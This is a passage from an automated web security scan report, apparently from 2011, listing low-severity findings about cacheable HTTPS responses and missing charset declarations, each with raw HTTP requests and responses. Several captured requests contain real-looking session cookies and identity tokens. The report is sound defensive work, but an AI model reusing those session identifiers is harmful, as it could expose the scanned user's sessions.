P3P: CP="NON ADMa OUR IND PHY ONL UNI COM NAV STA"
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

23. Cacheable HTTPS response previous next
There are 7 instances of this issue:

https://chat.livechatinc.net/licence/1019931/form_offline_0_en.html
https://chat.livechatinc.net/licence/1019931/open_chat.cgi
https://chat.livechatinc.net/licence/1019931/tunnel.cgi
https://lwn.net/login
https://maps-api-ssl.google.com/maps
https://spreadsheets.google.com/embeddedform
https://store.digitalriver.com/favicon.ico

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

23.1. https://chat.livechatinc.net/licence/1019931/form_offline_0_en.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://chat.livechatinc.net
Path:	/licence/1019931/form_offline_0_en.html

Request

GET /licence/1019931/form_offline_0_en.html HTTP/1.1
Host: chat.livechatinc.net
Connection: keep-alive
Referer: https://chat.livechatinc.net/licence/1019931/open_chat.cgi?groups=1&s=1&lang=en&dc=SESSdede027f997e7b165588bf3c431a00ec%3Dq25voncnf657rngjhpsai5d5p6%3B%20s_SupportDivison%3DCorporate%2520Support%3B%20has_js%3D1%3B%20s_cc%3Dtrue%3B%20gpv_pageName%3DSupport%2520%257C%2520Corporate%2520Support%2520%257C%2520Open%2520a%2520Support%2520Case%3B%20s_nr%3D1315144694450-New%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20__utma%3D38548641.275004050.1315144606.1315144606.1315144606.1%3B%20__utmb%3D38548641.10.10.1315144606%3B%20__utmc%3D38548641%3B%20__utmz%3D38548641.1315144606.1.1.utmcsr%3Dusa.kaspersky.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/about-us/contact-us%3B%20__utmv%3D38548641.anonymous%2520user%7C1%3DUser%2520roles%3Danonymous%2520user%3D1%3Bl%3Dhttp%3A//support.kasperskyamericas.com/corporate/live-chat%3Br%3Dundefined%3Bs%3Dundefined
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __livechat=lc_session%3DS1315144570.6ab74cb2ef%26lc_last_visit%3D1315144651%26lc_visit_number%3D1%26lc_page_view%3D4%26lc_nick%3D%24%26lc_lang%3Den%26lc_chat_number%3D0%26lc_all_invitation%3D0%26lc_ok_invitation%3D0%26lc_last_operator_id%3D%24%26lc_client_version%3D%24%26lc_last_conference_id%3D%24

Response

HTTP/1.1 200 OK
Content-Length: 472
Connection: Keep-Alive


<form action="" method="post" id="offline" name="offline" style="height:350px;overflow:auto">


<p>Sorry for the inconvenience,<br />
Chat is only available 8am to
...[SNIP]...

23.2. https://chat.livechatinc.net/licence/1019931/open_chat.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://chat.livechatinc.net
Path:	/licence/1019931/open_chat.cgi

Request

Response

23.3. https://chat.livechatinc.net/licence/1019931/tunnel.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://chat.livechatinc.net
Path:	/licence/1019931/tunnel.cgi

Request

POST /licence/1019931/tunnel.cgi?I3RqNyNwt1ti3gDdRQaO HTTP/1.1
Host: chat.livechatinc.net
Connection: keep-alive
Referer: https://chat.livechatinc.net/licence/1019931/open_chat.cgi?groups=1&s=1&lang=en&dc=SESSdede027f997e7b165588bf3c431a00ec%3Dq25voncnf657rngjhpsai5d5p6%3B%20s_SupportDivison%3DCorporate%2520Support%3B%20has_js%3D1%3B%20s_cc%3Dtrue%3B%20gpv_pageName%3DSupport%2520%257C%2520Corporate%2520Support%2520%257C%2520Open%2520a%2520Support%2520Case%3B%20s_nr%3D1315144694450-New%3B%20s_sq%3D%255B%255BB%255D%255D%3B%20__utma%3D38548641.275004050.1315144606.1315144606.1315144606.1%3B%20__utmb%3D38548641.10.10.1315144606%3B%20__utmc%3D38548641%3B%20__utmz%3D38548641.1315144606.1.1.utmcsr%3Dusa.kaspersky.com%7Cutmccn%3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/about-us/contact-us%3B%20__utmv%3D38548641.anonymous%2520user%7C1%3DUser%2520roles%3Danonymous%2520user%3D1%3Bl%3Dhttp%3A//support.kasperskyamericas.com/corporate/live-chat%3Br%3Dundefined%3Bs%3Dundefined
Content-Length: 20
Origin: https://chat.livechatinc.net
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __livechat=lc_session%3DS1315144570.6ab74cb2ef%26lc_last_visit%3D1315144651%26lc_visit_number%3D1%26lc_page_view%3D4%26lc_nick%3D%24%26lc_lang%3Den%26lc_chat_number%3D0%26lc_all_invitation%3D0%26lc_ok_invitation%3D0%26lc_last_operator_id%3D%24%26lc_client_version%3D%24%26lc_last_conference_id%3D%24

IWCS0102C^1019931^1^

Response

HTTP/1.1 200 OK
Content-type: text/html
Content-Length: 21
Connection: Keep-Alive

IWCS0089R^^^^0^0^^1

23.4. https://lwn.net/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://lwn.net
Path:	/login

Request

GET /login HTTP/1.1
Host: lwn.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.5. https://maps-api-ssl.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://maps-api-ssl.google.com
Path:	/maps

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.6. https://spreadsheets.google.com/embeddedform previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://spreadsheets.google.com
Path:	/embeddedform

Request

GET /embeddedform HTTP/1.1
Host: spreadsheets.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 14:02:22 GMT
Expires: Sun, 04 Sep 2011 14:02:22 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="robots" content="noarchive,noindex">
<title>Google Docs</title></head>
<body bgcolor="#FFFFFF"><style type="
...[SNIP]...

23.7. https://store.digitalriver.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.digitalriver.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: store.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a; VISITOR_ID=971D4E8DFAED4367B7156331573704A34236C16992AB1AF2; ORA_WX_SESSION=10.2.2.97:772-0#0; JSESSIONID=37414344B8FB9BBA8B5EF4F87545298F

Response

HTTP/1.1 200 OK
ETag: "37e-4b6b21a0"
Content-Type: text/plain
Last-Modified: Thu, 04 Feb 2010 19:36:00 GMT
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (H;max-age=28800+0;age=28768;ecid=105463765831,0)
Content-Length: 894
Date: Thu, 05 May 2011 19:34:15 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb03@dc2app92
Accept-Ranges: bytes

..............h.......(....... ...............H...H...........................................................VVW


                                                                                       .....tOL+.


                                       ...Q.

...[SNIP]...

24. HTML does not specify charset previous next
There are 30 instances of this issue:

http://a.tribalfusion.com/i.cid
http://a.tribalfusion.com/z/i.cid
http://ad.doubleclick.net/adi/idge.nww.home/
http://ad.doubleclick.net/clk
http://ads.pointroll.com/PortalServe/
http://amch.questionmarket.com/adscgen/d_layer.php
http://amch.questionmarket.com/adscgen/dynamiclink.js.php
http://api.addthis.com/oexchange/0.8/forward/email/offer
http://bs.serving-sys.com/BurstingPipe/adServer.bs
https://chat.livechatinc.net/licence/1019931/open_chat.cgi
https://chat.livechatinc.net/licence/1019931/tunnel.cgi
http://content.fiberlink.com/www/submodal/style.css
http://jqueryui.com/themeroller/
http://links.industrybrains.com/click
http://news.gmane.org/find-root.php
http://now.eloqua.com/visitor/v200/svrGP.aspx
http://office.microsoft.com/search/toc14.aspx
http://p4.dopjo7bdltoxq.fyhpecgfliaponup.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html
http://p4.dopjo7bdltoxq.fyhpecgfliaponup.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
http://p4.gzko2lfj5niqs.xz3ddzmhheuysknr.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html
http://p4.gzko2lfj5niqs.xz3ddzmhheuysknr.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
http://sourceforge.net/mailarchive/message.php
http://techtarget-www.baynote.net/baynote/tags3/common
http://wd.sharethis.com/api/getCount2.php
https://ws.sharethis.com/api/getCount2.php
http://www.cwsubscribe.com/favicon.ico
http://www.digitalriver.com/
http://www.sophelle.com/graphic/bullet-sm-w.gif
http://www.sophelle.com/images/sophelle-ico.ico
http://www.whatisnetwork.com/wp-admin/admin-ajax.php

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.

24.1. http://a.tribalfusion.com/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/i.cid

Request

GET /i.cid HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
X-Function: 409
X-Reuse-Index: 1
Content-Type: text/html
Content-Length: 140
Connection: Close

<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found </h1>The requested url was not found on this server.
</body></html>

24.2. http://a.tribalfusion.com/z/i.cid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/z/i.cid

Request

GET /z/i.cid HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.3. http://ad.doubleclick.net/adi/idge.nww.home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/idge.nww.home/

Request

Response

24.4. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Sun, 04 Sep 2011 13:59:46 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

24.5. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Request

Response

24.6. http://amch.questionmarket.com/adscgen/d_layer.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/d_layer.php

Request

Response

24.7. http://amch.questionmarket.com/adscgen/dynamiclink.js.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/dynamiclink.js.php

Request

Response

24.8. http://api.addthis.com/oexchange/0.8/forward/email/offer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://api.addthis.com
Path:	/oexchange/0.8/forward/email/offer

Request

GET /oexchange/0.8/forward/email/offer HTTP/1.1
Host: api.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Rate-Limit: -1
X-Rate-Remaining: 1
X-Rate-NextWindow: 0
Content-Type: text/html
Date: Sun, 04 Sep 2011 13:59:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Missing Required
...[SNIP]...

24.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=3000487&PluID=0&w=336&h=100&ncu=$$http://adclick.g.doubleclick.net/aclk?sa=L&ai=B7WlxT2tjTpaLFJ_gjATlyKz-BrO_h-YCAAAAEAEgADgAWJPJhK0yYMn-7obIo-AaggEXY2EtcHViLTY0NDM4MTk0OTE1MDExNDiyARV3d3cudGhlcmVnaXN0ZXIuY28udWu6AQlnZnBfaW1hZ2XIAQnaATtodHRwOi8vd3d3LnRoZXJlZ2lzdGVyLmNvLnVrLzIwMTEvMDgvMjIvc2t5cGVfc2VjdXJpdHlfYnVnL-ABA5gC1VKpAtATwGW2Mbs-wAIC4AIA6gIZNjk3OC9yZWdfc2VjdXJpdHkvbWFsd2FyZfgC8NEekAOsApgDjAaoAwHgBAGgBhY&num=0&sig=AOD64_2lTG27mrcB4Ea81VhBNzKnXYeVXA&client=ca-pub-6443819491501148&adurl=$$&ord=1259277961&ucm=true HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/08/22/skype_security_bug/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebOptOut=TRUE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 04 Sep 2011 12:13:05 GMT
Connection: close
Content-Length: 2581

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

24.10. https://chat.livechatinc.net/licence/1019931/open_chat.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://chat.livechatinc.net
Path:	/licence/1019931/open_chat.cgi

Request

Response

24.11. https://chat.livechatinc.net/licence/1019931/tunnel.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://chat.livechatinc.net
Path:	/licence/1019931/tunnel.cgi

Request

Response

HTTP/1.1 200 OK
Content-type: text/html
Content-Length: 21
Connection: Keep-Alive

IWCS0089R^^^^0^0^^1

24.12. http://content.fiberlink.com/www/submodal/style.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://content.fiberlink.com
Path:	/www/submodal/style.css

Request

GET /www/submodal/style.css HTTP/1.1
Host: content.fiberlink.com
Proxy-Connection: keep-alive
Referer: http://content.fiberlink.com/www/submodal/loading.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Content-Length: 345
Date: Sun, 04 Sep 2011 14:34:45 GMT
Server: bit_asic/3.8/h18s1/v1-bitcast-a.v1.o1.sjc1

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

24.13. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.14. http://links.industrybrains.com/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://links.industrybrains.com
Path:	/click

Request

GET /click HTTP/1.1
Host: links.industrybrains.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Connection: close
Date: Sun, 04 Sep 2011 14:01:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 04 Sep 2011 14:01:57 GMT
Content-Length: 77

<html><body>Invalid request</body></html>

24.15. http://news.gmane.org/find-root.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.gmane.org
Path:	/find-root.php

Request

GET /find-root.php HTTP/1.1
Host: news.gmane.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 14:02:02 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny8 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny8
Vary: Accept-Encoding
Content-Length: 15
Connection: close
Content-Type: text/html

No such article

24.16. http://now.eloqua.com/visitor/v200/svrGP.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://now.eloqua.com
Path:	/visitor/v200/svrGP.aspx

Request

GET /visitor/v200/svrGP.aspx?pps=3&siteid=1856&ref2=http%3A//www.google.com/%23sclient%3Dpsy%26hl%3Den%26tbm%3Dnws%26source%3Dhp%26q%3D%2522xss.cx%2522%26pbx%3D1%26oq%3D%2522xss.cx%2522%26aq%3Df%26aqi%3D%26aql%3D%26gs_sm%3De%26gs_upl%3D4842l5841l1l6289l8l7l0l0l0l0l221l967l2.3.2l7l0%26fp%3D1%26biw%3D1407%26bih%3D931%26bav%3Don.2%2Cor.r_gc.r_pw.%26cad%3Db&tzo=360&ms=866 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://blogs.computerworld.com/18810/happy_hackers_attack_sites_submit_hacks_for_ratings_on_rankmyhack
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=F788D26BA3284C76A75E75F5D13F522A; ELQSTATUS=OK

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Sun, 04 Sep 2011 12:17:26 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;

24.17. http://office.microsoft.com/search/toc14.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://office.microsoft.com
Path:	/search/toc14.aspx

Request

GET /search/toc14.aspx?NS=MSOUC&VERSION=14&LCID=1033&SYSLCID=1033&UILCID=1033&AD=1&tl=2&CID=&CTT=98 HTTP/1.1
X-Office-Version: 14.0.5128
User-Agent: Microsoft Office/14.0 (Windows NT 6.1; CLView 14.0.5128; Pro)
Host: office.microsoft.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: awsuserguid=guid=c03bc980-6bad-4729-88d6-cf3740c04b05; msdn=L=1033; A=I&I=AxUFAAAAAADfBwAAPV9jhGBOQg0h7q+eMRxLCA!!; MC1=GUID=b9a5a4f722f8264b834cb9d69a104d9f&HASH=f7a4&LV=20118&V=3; WT_FPC=id=22f485b698e6e3df3a31314443653874:lv=1314445266176:ss=1314443653874; MSID=Microsoft.CreationDate=08/27/2011 14:14:15&Microsoft.LastVisitDate=08/29/2011 04:08:21&Microsoft.VisitStartDate=08/29/2011 04:08:21&Microsoft.CookieId=a6ff5e65-f963-46f4-ab65-9c919eb1ab8b&Microsoft.TokenId=db79d3a0-2a3c-4e4c-a9c0-40914b282894&Microsoft.NumberOfVisits=11&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=sx3rUy39mI68bevXQ7k87cwCqeNSopULsjYUG+hsYalGTiUx6jeQjNA6Ynoqygb01mTPbguspI0cE5QtKkCZUceVkGrDbkcyvNHXMN+wNXdxQUnzlZmBD9+p9UQ3A4gtSv4b4Da5TzGro96DrT2zvwSx7bl61d4dZMkvsbPig1l3//8Wk96/vTiO4gjz3Yay/MDldPt66DHKXXuMaAsWbo2d199zl0q2n/k4qWWq7ZXUs2rD82X4NVrQyuf112WpJ9FGl96sQUadd/iLPYoKlKsqcH/WByajuTC8KbxFINpY4YSpvG51a/eYFs2ZyYz1GZZ6CEQvAqfbKyu+W/ppuGSDFR8YOXTg9PbRr7atK99ZKGuUfwiqnioMsn3P2jreJ9MjQ0K8gM4z9qjmnZbg+hKsFjSB7F2acwb1xScBtXLDFedsEWoOcBcDGPPt8uMuMcwtaeYrqxcz1Z6aMRJIsIl0r40oWnCzf9YdVHUOUzIiHTKk/SELEwC0MEJpwYlIrXfD2hQL0Ecd2RsLSIa+Lx+Uw55bkMszUNz1TFRmwjw=&Microsoft.MicrosoftId=0346-8428-4514-6859; s_nr=1314522014548; s_vnum=1317114014550%26vn%3D1; R=200011647-8/28/2011 4:10:55; fsr.rbo={"d":90,"i":"1314522262806_565503","e":1315127115605}; msresearch=1

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
P3P: CP="ADM CAO CONi COR CUR DEV DSP IND OTRi OUR PSA PUBi STA STP"
X-UA-Compatible: IE=9
X-LLCC: en-US
X-Machine: SN1REN138
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 14.0.0.6029
Date: Sun, 04 Sep 2011 14:30:27 GMT
Content-Length: 202

...<?xml version="1.0" encoding="utf-8"?>
<o:results o:oops="2011-06-01T00:00:00" xmlns:o="urn:schemas-microsoft-com:office:office">
<o:ch o:url="CH101845606" o:title="Upload Center" />
</o:result
...[SNIP]...

24.18. http://p4.dopjo7bdltoxq.fyhpecgfliaponup.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p4.dopjo7bdltoxq.fyhpecgfliaponup.if.v4.ipv6-exp.l.google.com
Path:	/intl/en/ipv6/exp/iframe.html

Request

GET /intl/en/ipv6/exp/iframe.html HTTP/1.1
Host: p4.dopjo7bdltoxq.fyhpecgfliaponup.if.v4.ipv6-exp.l.google.com
Proxy-Connection: keep-alive
Referer: http://p4.dopjo7bdltoxq.fyhpecgfliaponup.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Last-Modified: Tue, 19 Jul 2011 09:12:38 GMT
Date: Sun, 04 Sep 2011 12:32:04 GMT
Expires: Sun, 04 Sep 2011 12:32:04 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 2298
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<script type=text/javascript>
(function() {

var f=this,g=function(b,d){var a=b.split("."),c=f;!(a[0]in c)&&c.execScript&&c.execScript("var
...[SNIP]...

24.19. http://p4.dopjo7bdltoxq.fyhpecgfliaponup.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p4.dopjo7bdltoxq.fyhpecgfliaponup.if.v4.ipv6-exp.l.google.com
Path:	/intl/en/ipv6/exp/redir.html

Request

GET /intl/en/ipv6/exp/redir.html HTTP/1.1
Host: p4.dopjo7bdltoxq.fyhpecgfliaponup.if.v4.ipv6-exp.l.google.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1315157559&flash=10.3.183&url=file%3A%2F%2F%2FD%3A%2Fcdn%2F2011%2F09%2F04%2Fghdb%2Fdork-reflected-xss-cross-site-scripting-cwe79-capec86-javascript-injection-example-poc-report-usakaperskycom.html&dt=1315139558764&bpp=4&shv=r20110824&jsv=r20110719&correlator=1315139559131&frm=4&adk=1607234649&ga_vid=908310405.1315139559&ga_sid=1315139559&ga_hid=1398972348&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=20&u_nmime=100&dff=times%20new%20roman&dfs=16&biw=1033&bih=894&fu=0&ifi=1&dtd=385&xpc=lkVIacehW0&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=adjUfKLVPxXBppHUZY480YLDjE2TXEqeAmIjGpHBlcaVF6wbQm-JEpHPhJt98LMnhozRMS6AaEQsoCz_w7ME2nqO3ThcslHhnVrL_zzIP2KvvGHfuHPNv9mBijj8N4Cd

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Last-Modified: Wed, 25 May 2011 00:42:54 GMT
Date: Sun, 04 Sep 2011 12:32:03 GMT
Expires: Sun, 04 Sep 2011 12:32:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 216
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html>
<head>
<title></title>
<meta http-equiv='refresh' content='0;URL=iframe.html' />
</head>

<body>
<script type=text/javascript>document.location.replace('iframe.html');</script>

...[SNIP]...

